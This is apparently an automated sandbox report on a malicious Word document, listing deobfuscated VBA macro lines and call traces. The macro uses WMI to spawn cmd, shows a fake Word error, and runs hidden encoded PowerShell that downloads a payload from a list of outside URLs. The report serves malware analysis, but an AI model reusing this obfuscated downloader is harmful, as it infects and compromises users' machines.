KAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQA,,) -> 0

                                                                    S2xsub800b7

                                                                    Tl85j6j2gy2n7qad

                                                                    Array

                                                                    uFHXMGsDH

                                                                    Target

                                                                    Split

                                                                    UupSwG

                                                                    wbcoCJA

                                                                    StringsDecrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db ""ndpns wu db nd"
                                                                    "ns wu db ndrons wu db ndns wu db ndc""ens wu db ndsns wu db ndsns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db nd:wns wu db ndns w""u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "wns wu db ndi""nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns wu db ndns wu db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    LineInstructionMeta Information
                                                                    2

                                                                    Function Xusmagx95iuck_o3o()

                                                                    3

                                                                    Goto snBUla

                                                                    executed
                                                                    4

                                                                    Const AjzpdH as String = "A"

                                                                    5

                                                                    Const jbkkjHHCd as String = ","

                                                                    6

                                                                    Const yqmFHJvF as String = "*high*,*critic*"

                                                                    7

                                                                    Dim FwMLnnSxs as Range

                                                                    7

                                                                    Set FwMLnnSxs = Array((AjzpdH), Target)

                                                                    Array

                                                                    AjzpdH

                                                                    Target

                                                                    8

                                                                    If FwMLnnSxs Is Nothing Then

                                                                    9

                                                                    Endif

                                                                    10

                                                                    Dim rnfVw() as String

                                                                    10

                                                                    rnfVw = Split(yqmFHJvF, jbkkjHHCd)

                                                                    Split

                                                                    yqmFHJvF

                                                                    jbkkjHHCd

                                                                    10

                                                                    snBUla:

                                                                    12

                                                                    skuwd = Nkemmqfhxex + U765y5vgf_ao0faq.Content + Dt5ebejo9lypr_3vmp

                                                                    Nkemmqfhxex

                                                                    Content

                                                                    Dt5ebejo9lypr_3vmp

                                                                    15

                                                                    Goto uUNTnPDJ

                                                                    16

                                                                    Const wPuUI as String = "A"

                                                                    17

                                                                    Const QNBiBDJF as String = ","

                                                                    18

                                                                    Const TfZstIBWb as String = "*high*,*critic*"

                                                                    19

                                                                    Dim GyemVIEQ as Range

                                                                    19

                                                                    Set GyemVIEQ = Array((wPuUI), Target)

                                                                    Array

                                                                    wPuUI

                                                                    Target

                                                                    20

                                                                    If GyemVIEQ Is Nothing Then

                                                                    21

                                                                    Endif

                                                                    22

                                                                    Dim kTIuCnPI() as String

                                                                    22

                                                                    kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)

                                                                    Split

                                                                    TfZstIBWb

                                                                    QNBiBDJF

                                                                    22

                                                                    uUNTnPDJ:

                                                                    24

                                                                    mjbBYHhbs = "ns wu db " + "ndpns wu db nd"

                                                                    25

                                                                    I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"

                                                                    26

                                                                    Goto dtPsGEOG

                                                                    27

                                                                    Const mQUInscCB as String = "A"

                                                                    28

                                                                    Const PmHbFtBA as String = ","

                                                                    29

                                                                    Const NxyDdD as String = "*high*,*critic*"

                                                                    30

                                                                    Dim ENgVDEnDI as Range

                                                                    30

                                                                    Set ENgVDEnDI = Array((mQUInscCB), Target)

                                                                    Array

                                                                    mQUInscCB

                                                                    Target

                                                                    31

                                                                    If ENgVDEnDI Is Nothing Then

                                                                    32

                                                                    Endif

                                                                    33

                                                                    Dim TmgVHr() as String

                                                                    33

                                                                    TmgVHr = Split(NxyDdD, PmHbFtBA)

                                                                    Split

                                                                    NxyDdD

                                                                    PmHbFtBA

                                                                    33

                                                                    dtPsGEOG:

                                                                    35

                                                                    A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"

                                                                    36

                                                                    Goto bwTdFGH

                                                                    37

                                                                    Const ZcbWFy as String = "A"

                                                                    38

                                                                    Const jmprxcAGG as String = ","

                                                                    39

                                                                    Const uwcdCFcFJ as String = "*high*,*critic*"

                                                                    40

                                                                    Dim GhFhH as Range

                                                                    40

                                                                    Set GhFhH = Array((ZcbWFy), Target)

                                                                    Array

                                                                    ZcbWFy

                                                                    Target

                                                                    41

                                                                    If GhFhH Is Nothing Then

                                                                    42

                                                                    Endif

                                                                    43

                                                                    Dim auKzIlBI() as String

                                                                    43

                                                                    auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)

                                                                    Split

                                                                    uwcdCFcFJ

                                                                    jmprxcAGG

                                                                    43

                                                                    bwTdFGH:

                                                                    45

                                                                    Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"

                                                                    46

                                                                    Goto FCnAjUBF

                                                                    47

                                                                    Const upIoDlhH as String = "A"

                                                                    48

                                                                    Const BZLGJ as String = ","

                                                                    49

                                                                    Const DpdIEHHc as String = "*high*,*critic*"

                                                                    50

                                                                    Dim yifdCzUX as Range

                                                                    50

                                                                    Set yifdCzUX = Array((upIoDlhH), Target)

                                                                    Array

                                                                    upIoDlhH

                                                                    Target

                                                                    51

                                                                    If yifdCzUX Is Nothing Then

                                                                    52

                                                                    Endif

                                                                    53

                                                                    Dim vmuBOT() as String

                                                                    53

                                                                    vmuBOT = Split(DpdIEHHc, BZLGJ)

                                                                    Split

                                                                    DpdIEHHc

                                                                    BZLGJ

                                                                    53

                                                                    FCnAjUBF:

                                                                    55

                                                                    Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    56

                                                                    Goto dmJpUJBT

                                                                    57

                                                                    Const LFmsHlGJO as String = "A"

                                                                    58

                                                                    Const VlJBAxsF as String = ","

                                                                    59

                                                                    Const DReLBGD as String = "*high*,*critic*"

                                                                    60

                                                                    Dim IUtVX as Range

                                                                    60

                                                                    Set IUtVX = Array((LFmsHlGJO), Target)

                                                                    Array

                                                                    LFmsHlGJO

                                                                    Target

                                                                    61

                                                                    If IUtVX Is Nothing Then

                                                                    62

                                                                    Endif

                                                                    63

                                                                    Dim LgSUu() as String

                                                                    63

                                                                    LgSUu = Split(DReLBGD, VlJBAxsF)

                                                                    Split

                                                                    DReLBGD

                                                                    VlJBAxsF

                                                                    63

                                                                    dmJpUJBT:

                                                                    65

                                                                    C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v

                                                                    66

                                                                    Goto cskzymBH

                                                                    67

                                                                    Const QttEc as String = "A"

                                                                    68

                                                                    Const sInuFuLII as String = ","

                                                                    69

                                                                    Const ybkwIF as String = "*high*,*critic*"

                                                                    70

                                                                    Dim YYiqHCrBJ as Range

                                                                    70

                                                                    Set YYiqHCrBJ = Array((QttEc), Target)

                                                                    Array

                                                                    QttEc

                                                                    Target

                                                                    71

                                                                    If YYiqHCrBJ Is Nothing Then

                                                                    72

                                                                    Endif

                                                                    73

                                                                    Dim jEGWECK() as String

                                                                    73

                                                                    jEGWECK = Split(ybkwIF, sInuFuLII)

                                                                    Split

                                                                    ybkwIF

                                                                    sInuFuLII

                                                                    73

                                                                    cskzymBH:

                                                                    75

                                                                    Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)

                                                                    76

                                                                    Goto GKCGI

                                                                    77

                                                                    Const JNPIBwzJy as String = "A"

                                                                    78

                                                                    Const xJhvfW as String = ","

                                                                    79

                                                                    Const MtSXGFAwF as String = "*high*,*critic*"

                                                                    80

                                                                    Dim CtnVB as Range

                                                                    80

                                                                    Set CtnVB = Array((JNPIBwzJy), Target)

                                                                    Array

                                                                    JNPIBwzJy

                                                                    Target

                                                                    81

                                                                    If CtnVB Is Nothing Then

                                                                    82

                                                                    Endif

                                                                    83

                                                                    Dim QFCSIz() as String

                                                                    83

                                                                    QFCSIz = Split(MtSXGFAwF, xJhvfW)

                                                                    Split

                                                                    MtSXGFAwF

                                                                    xJhvfW

                                                                    83

                                                                    GKCGI:

                                                                    85

                                                                    Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)

                                                                    GetObject("winmgmts:win32_process")

                                                                    executed
                                                                    86

                                                                    Goto OQtflfHc

                                                                    87

                                                                    Const vXvXQH as String = "A"

                                                                    88

                                                                    Const BBnudDV as String = ","

                                                                    89

                                                                    Const AnoeDGEY as String = "*high*,*critic*"

                                                                    90

                                                                    Dim nUxeKfi as Range

                                                                    90

                                                                    Set nUxeKfi = Array((vXvXQH), Target)

                                                                    Array

                                                                    vXvXQH

                                                                    Target

                                                                    91

                                                                    If nUxeKfi Is Nothing Then

                                                                    92

                                                                    Endif

                                                                    93

                                                                    Dim LJgRGnI() as String

                                                                    93

                                                                    LJgRGnI = Split(AnoeDGEY, BBnudDV)

                                                                    Split

                                                                    AnoeDGEY

                                                                    BBnudDV

                                                                    93

                                                                    OQtflfHc:

                                                                    95

                                                                    mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))

                                                                    Mid

                                                                    Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu d) -> 37616

                                                                    executed
                                                                    96

                                                                    pqwm = Zr9iedzfw6nr(mxkikw)

                                                                    97

                                                                    Goto zImEIFI

                                                                    98

                                                                    Const TYMfJE as String = "A"

                                                                    99

                                                                    Const ppqanE as String = ","

                                                                    100

                                                                    Const zzXfBb as String = "*high*,*critic*"

                                                                    101

                                                                    Dim YXgZLBuTI as Range

                                                                    101

                                                                    Set YXgZLBuTI = Array((TYMfJE), Target)

                                                                    Array

                                                                    TYMfJE

                                                                    Target

                                                                    102

                                                                    If YXgZLBuTI Is Nothing Then

                                                                    103

                                                                    Endif

                                                                    104

                                                                    Dim qJJnPFoNQ() as String

                                                                    104

                                                                    qJJnPFoNQ = Split(zzXfBb, ppqanE)

                                                                    Split

                                                                    zzXfBb

                                                                    ppqanE

                                                                    104

                                                                    zImEIFI:

                                                                    106

                                                                    Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad

                                                                    SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQA,,) -> 0

                                                                    S2xsub800b7

                                                                    Tl85j6j2gy2n7qad

                                                                    executed
                                                                    107

                                                                    Goto LcJWChpF

                                                                    108

                                                                    Const uFHXMGsDH as String = "A"

                                                                    109

                                                                    Const wbcoCJA as String = ","

                                                                    110

                                                                    Const UupSwG as String = "*high*,*critic*"

                                                                    111

                                                                    Dim IfvyDH as Range

                                                                    111

                                                                    Set IfvyDH = Array((uFHXMGsDH), Target)

                                                                    Array

                                                                    uFHXMGsDH

                                                                    Target

                                                                    112

                                                                    If IfvyDH Is Nothing Then

                                                                    113

                                                                    Endif

                                                                    114

                                                                    Dim HfUXFJwF() as String

                                                                    114

                                                                    HfUXFJwF = Split(UupSwG, wbcoCJA)

                                                                    Split

                                                                    UupSwG

                                                                    wbcoCJA

                                                                    114

                                                                    LcJWChpF:

                                                                    116

                                                                    End Function

                                                                    Function Zr9iedzfw6nr, APIs: 62, Strings: 12, Number of lines: 50, Relevance: 111.05
                                                                    APIsMeta Information

                                                                    Array

                                                                    OtpOArK

                                                                    Target

                                                                    Split

                                                                    iJkmJG

                                                                    mbLvUI

                                                                    Array

                                                                    vQbVHTJ

                                                                    Target

                                                                    Split

                                                                    mbdQXnNAJ

                                                                    SRadpEcF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: UrnhFG

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LYEtDJDB

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: AeZXCL

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: bTSPCh

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: XfKDE

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: eJIkEagfC

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rlKxF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: VVDiBADws

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TziQbRH

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Replace

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: He0e1df114_gsl7i

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rwAdJC

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: buaHCHyIN

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: HzpNhFB

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SdueDATuJ

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

